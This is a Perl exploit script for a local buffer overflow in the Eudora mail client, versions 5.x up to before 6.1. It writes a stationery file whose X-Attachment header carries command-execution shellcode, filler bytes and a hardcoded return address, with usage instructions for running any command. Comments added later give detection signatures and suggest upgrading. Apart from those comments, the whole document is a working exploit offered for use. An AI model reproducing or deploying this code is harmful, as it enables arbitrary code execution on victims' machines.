# Author:		LibX (libx@easydoesit.com)
# Date:			29-06-2004
# Exploit #:		1

# Program:		Eudora
# Tested on:		v5.1 / v6.0.1.1 / v6.0.22 / v6.0.3 All English (NT/2K/XP all service packs)
# Exploit Type:		Local Buffer overflow
# Shellcode:		Shellcode to execute a command
# Shellcode version:	v2.5 PRIVATE (GENERIC)
# How-to-use:		EudExploit.pl <command to execute> > <urfilename>.sta



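# Usage guard: with no command argument, print the help text and stop before
# any message is generated.
# NOTE(review): this is a plain truthiness test, so an argument of "0" or ""
# is treated the same as a missing argument.
if(!($ARGV[0]))
{

	# Every line is newline-terminated so the banner, usage and sample lines
	# do not run together on the terminal.
	print("Eudora v5.x to <6.1 attachment bufferoverflow exploit v2.5\n");
	print("Usage: EudExploit.pl <command to execute> > <urfilename>.sta\n\n");
	print("Sample: EudExploit.pl notepad.exe > TestShell.sta\n");
	exit;

}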



# command execution shellcode
# Builds the payload string: a fixed block of raw bytes, then the command
# taken verbatim from $ARGV[0], then a single 0xFF byte.
# The argument is not validated or escaped here; whatever is passed on the
# command line is embedded as-is.
# Defender note: the result is raw binary that the script later places in an
# X-Attachment header, so header bytes outside printable ASCII are a usable
# filtering signal when inspecting messages or stationery files.
$shellcode = 		"\xEB\x6D\x5F\xB9\x11\x11\x11\x11" .
			"\x89\xCB\xFC\xB0\xFF\xF2\xAE\x87" .
			"\xD9\x29\xD9\x81\xC7\x10\x11\x11" .
			"\x11\x81\xEF\x11\x11\x11\x11\xFE" .
			"\x07\x81\xC1\x10\x11\x11\x11\x81" .
			"\xE9\x11\x11\x11\x11\x29\xCF\x31" .
			"\xF6\x46\x56\x57\xBB\x66\x8B\x45" .
			"\x0C\xB9\x11\x11\x11\x11\xB8\x41" .
			"\x11\x11\x11\x2D\x32\x11\x11\x11" .
			"\x64\x8B\x40\x21\x8B\x40\x0C\x8B" .
			"\x70\x1C\xAD\x8B\x78\x08\x47\xB0" .
			"\x66\xF2\xAE\xEB\x01\x90\x4F\xFF" .
			"\x37\x5E\x39\xF3\x74\x02\xEB\xEE" .
			"\x8D\x47\xEA\xFF\xD0\xCD\x03\xE8" .
			"\x8E\xFF\xFF\xFF" . $ARGV[0] . "\xFF";



# Filler: "A" characters that pad the payload so that shellcode plus filler
# total 268 bytes, the fixed amount that precedes the return address in the
# X-Attachment value printed at the end of the script.
$buffer		= "A" x (268 - length($shellcode));



# EuLang.dll universal return address (625010E9: call edi)
# The four bytes below are that address, 0x625010E9, in little-endian order.
# Defender note: this fixed 4-byte sequence at the end of an over-long
# X-Attachment value is a concrete signature to search for in mail stores,
# stationery (.sta) files and gateway logs.
$return		= "\xE9\x10\x50\x62";



# Writes the finished file to STDOUT (the usage text redirects it into a .sta
# file): three ordinary headers, then an X-Attachment header whose value is
# shellcode + filler + return address, then a blank line.
# Defender note: the X-Attachment value is at least 272 bytes (268 + 4) of
# mostly non-text data, which no legitimate attachment path would produce;
# length and non-ASCII checks on that header are a reasonable detection rule.
# The banner gives the affected range as Eudora 5.x up to but not including
# 6.1, so upgrading to 6.1 or later is presumably the fix (confirm against
# vendor notes).
print("From: me\n");
print("To: you\n");
print("Subject: Eudora 5.x/<6.1 buffer overflow exploit\n");
print("X-Attachment: " . $shellcode . $buffer . $return . "\n\n");